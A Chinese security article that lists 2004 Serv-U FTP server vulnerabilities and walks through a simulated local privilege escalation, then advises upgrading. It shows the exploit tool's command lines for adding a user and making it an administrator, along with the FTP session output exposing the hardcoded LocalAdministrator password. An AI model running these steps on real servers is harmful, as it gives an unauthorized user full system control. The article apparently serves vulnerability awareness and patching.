网络安全 频道

防范Serv-U下的漏洞

  一次模拟入侵

  我们可以从国内权威安全组织“绿盟”漏洞数据库中查找到在过去一年内的相关Serv-U漏洞,结果足让人吃惊,平均下来三个月就有一次漏洞。

  2004-09-14 Serv-U FTP服务器设备文件名远程拒绝服务漏洞

  2004-08-09 Serv-U本地权限提升漏洞

  2004-04-22 Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞

  2004-02-27 Serv-U FTP服务器MDTM命令远程缓冲区溢出漏洞

  2004-01-29 Serv-U FTP服务器SITE CHMOD命令超长文件名远程溢出漏洞

  下面我们就以Serv-U本地权限提升漏洞为例来说明其危害性。

  PCS小提示:尽管在Serv-U6.0.0.2中增加了密码安全设置功能。但是本文作者在对Serv-U6.0.0.2进行测试的时候发现,在安装Serv-U的服务器权限设置不当的时候依然能提升权限成功。

  漏洞发现日期:2004-08-09

  影响版本:RhinoSoft Serv-U 3.0.0.20 至RhinoSoft Serv-U 6.0.0.2

  漏洞危害:Serv-U存在设计问题,本地攻击者可以利用这个漏洞以SYSTEM权限在操作系统上执行任意命令。

  测试环境:Microsoft Windows Server 2003, Enterprise Edition+Serv-U FTP Server 6.0.0.2

  测试过程:

  第一步:以普通用户身份登录Windows,在开始菜单的运行窗口中输入cmd,在命令提示符下输入Serv-U6(运行Serv-U6本地提升权限工具):

  
  输入serv-u6.exe 43958 “net user test test /add”,添加一个名为“test”的用户。

  第二步:接着输入serv-u6.exe 43958 “net localgroup administrators test /add”将该账户提升为超级用户权限,如果成功,那么软件界面将会返回提示信息

  <220 Serv-U FTP Server v6.0 for WinSock ready...

  >USER LocalAdministrator

  <331 User name okay, need password.

  ******************************************************

  >PASS #l@$ak#.lk;0@P

  <230 User logged in, proceed.

  ******************************************************

  这个时候,你可以使用用户名test,密码test进行登录了,并且发现自己已经成为超级用户了,这里不需要再说明什么了,你已经拥有了系统的超级权限了,入侵者已经可以在你的电脑上为所欲为了。

  漏洞解决方案:尽快升级到最新版本,由于此本地提升权限漏洞为软件设计问题,并非程序出现异常。

0
相关文章